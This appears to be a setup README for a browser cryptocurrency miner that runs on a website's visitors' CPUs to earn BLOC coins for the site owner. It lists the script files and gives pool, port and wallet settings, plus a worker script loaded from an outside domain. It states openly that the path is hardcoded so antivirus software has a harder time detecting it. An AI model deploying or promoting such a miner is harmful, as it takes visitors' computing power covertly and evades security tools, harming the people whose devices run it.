With this miner, you can mine BLOC coins using your visitors CPU power. It will mine directly in browser.
- grant video streaming time
- offer files for download
- allow ad-free browsing on your site
- credit in-game money or items in your game
We are excited to see how you will use this service. We dream about it as an alternative to micro payments, artificial wait time in online games, intrusive ads and dubious marketing tactics.
Your users can “pay” you with full privacy, without registering an account anywhere, without installing a browser extension and without being bombarded by shady ads. They will pay you with just their CPU power.
Files available in this script
- worker.js - the worker receives a job and calculates the hash
- cn.js - the actual webasm mining algorithm
- test_with_output.html - html file that outputs some mining stats (this will start the whole mining process)
- test_minimal.html - html file with minimal setup (no mining output stats)
How to set it up
Copy all the files on a domain and change the following:
var mining_pool = 'bloc-mining.eu'; // mining pool domain
this is the mining pool domain. we recommend leaving it untouched.
var mining_port = '4444'; // mining pool port
this is the mining pool port (for CPU mining). we recommend leaving it untouched.
var mining_wallet = 'abLoc5jeufY8yWkZgjDJnP6DuuhyGE3jb5F6kmKKqqynhbUDgfvvC2FjdP5DjjnoW2R9aecMDETTbdMuFNFzHRWvGNkzHGKHMT9'; // your wallet address
this is the wallet where the coins will be sent by the mining pool.
Edit m.js file and go to the line where you find
var newWorker = new Worker("https://bloc-mining.com/assets/frontpanel/js/newminer/worker.js?_=" + Math.random().toString());
https://bloc-mining.com/assets/frontpanel/js/newminer/worker.js is the path to
worker.js file from the
js folder. Make sure you use the absolute path, like it is here.
The reason it's hardcoded, is to be harder for antiviruses to find it.
How to run it
Simply navigate to
test_minimal.html and you will start mining.
- To mine, choose one of the .html files
test_minimal.html. Do not use them both!
- All .js files must be in the same folder, otherwise you need to change the paths youself